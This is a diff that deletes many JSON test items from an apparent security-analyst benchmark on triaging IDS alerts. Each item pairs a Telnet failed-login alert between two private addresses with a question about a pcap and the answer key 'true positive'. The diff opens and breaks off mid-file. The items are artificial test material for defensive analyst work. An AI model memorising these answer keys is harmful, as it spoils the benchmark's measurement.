192.168.1.90:23 -> 192.168.1.70:36364", - "alert": "01/02-00:12:03.535510 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36364", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21243.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21243.json deleted file mode 100644 index fba7bccbc54e45bb1c2e2351f4a4623eb21edd95..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21243.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21243", - "alert_type": "True", - "alert_name": "dp_21243" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:08.580499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44106", - "alert": "01/02-00:12:08.580499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44106", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21249.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21249.json deleted file mode 100644 index 510f8cbe71c0d684ccda5d6b146ec24ab649d12d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21249.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21249", - "alert_type": "True", - "alert_name": "dp_21249" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:11.271409 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "alert": "01/02-00:12:11.271409 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21275.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21275.json deleted file mode 100644 index 3f7b52ae1cd90804db17e0b4b3f1c2381791f9f1..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21275.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21275", - "alert_type": "True", - "alert_name": "dp_21275" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:17.662481 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40448", - "alert": "01/02-00:12:17.662481 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40448", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21344.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21344.json deleted file mode 100644 index 76bab132eb308660d8d2c2c4445c10a8f6b615fc..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21344.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21344", - "alert_type": "True", - "alert_name": "dp_21344" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:38.719478 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "alert": "01/02-00:12:38.719478 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21350.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21350.json deleted file mode 100644 index 5717a087d3705a785d6797c9294985b7e8441d6b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21350.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21350", - "alert_type": "True", - "alert_name": "dp_21350" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:41.543084 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "alert": "01/02-00:12:41.543084 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43556", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21400.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21400.json deleted file mode 100644 index c2eb598cce788b400a0e5e88c4766afa84433478..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21400.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21400", - "alert_type": "True", - "alert_name": "dp_21400" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:55.732303 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "alert": "01/02-00:12:55.732303 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21409.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21409.json deleted file mode 100644 index 18d46c08aec6956a5f4386b36ffb2f67d06b7979..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21409.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21409", - "alert_type": "True", - "alert_name": "dp_21409" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:58.468039 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "alert": "01/02-00:12:58.468039 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21413.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21413.json deleted file mode 100644 index 796f06a8a7612508665f1147675997777227d2a4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21413.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21413", - "alert_type": "True", - "alert_name": "dp_21413" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:12:59.635582 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49440", - "alert": "01/02-00:12:59.635582 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49440", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21438.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21438.json deleted file mode 100644 index a4cb3cd4d12e53085c7ee0be15df09e56d270bb7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21438.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21438", - "alert_type": "True", - "alert_name": "dp_21438" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:08.301930 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46770", - "alert": "01/02-00:13:08.301930 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46770", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21495.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21495.json deleted file mode 100644 index 5a431fc83d37bc77e5e159bc4540d8c01a371f0d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21495.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21495", - "alert_type": "True", - "alert_name": "dp_21495" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:24.043584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36806", - "alert": "01/02-00:13:24.043584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36806", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21504.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21504.json deleted file mode 100644 index 70a76809804b4d167cdc3fd072d69fe71457f838..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21504.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21504", - "alert_type": "True", - "alert_name": "dp_21504" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:27.134795 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "alert": "01/02-00:13:27.134795 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21518.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21518.json deleted file mode 100644 index 5a546f61810fe0773e0828de3323145ce50c2359..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21518.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21518", - "alert_type": "True", - "alert_name": "dp_21518" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:32.169134 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51074", - "alert": "01/02-00:13:32.169134 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51074", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21558.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21558.json deleted file mode 100644 index a0ef2716126041039e9e4654c008bcc7eaf0bfd8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21558.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21558", - "alert_type": "True", - "alert_name": "dp_21558" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:44.077550 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60392", - "alert": "01/02-00:13:44.077550 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60392", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21572.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21572.json deleted file mode 100644 index b482dc808f39593be18480231814cbb7ef330784..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21572.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21572", - "alert_type": "True", - "alert_name": "dp_21572" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:47.954345 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60404", - "alert": "01/02-00:13:47.954345 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60404", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21589.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21589.json deleted file mode 100644 index 93182560d6e9ad31d0447d6ea3a0609d67eb4f4b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21589.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21589", - "alert_type": "True", - "alert_name": "dp_21589" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:12.978957+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "alert": "1970-01-02T00:11:12.978957+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21590.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21590.json deleted file mode 100644 index b7e8972f516b4ae8b6e321c0584c5fd3ad4a5b95..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21590.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21590", - "alert_type": "True", - "alert_name": "dp_21590" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:14.039664+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41688", - "alert": "1970-01-02T00:11:14.039664+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41688", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21596.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21596.json deleted file mode 100644 index 9e6288f67a1383b9da715d63aabc9685dc6a0d58..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21596.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21596", - "alert_type": "True", - "alert_name": "dp_21596" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:23.395694+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40162", - "alert": "1970-01-02T00:11:23.395694+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40162", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21602.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21602.json deleted file mode 100644 index c9a68e9e78aa8bda46e90c83e084be0140c7663d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21602.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21602", - "alert_type": "True", - "alert_name": "dp_21602" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:33.461522+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47436", - "alert": "1970-01-02T00:11:33.461522+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47436", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21604.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21604.json deleted file mode 100644 index 42bde4ac6a83f4840782ecf3421dc94d99325878..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21604.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21604", - "alert_type": "True", - "alert_name": "dp_21604" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:36.706962+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51226", - "alert": "1970-01-02T00:11:36.706962+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51226", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you 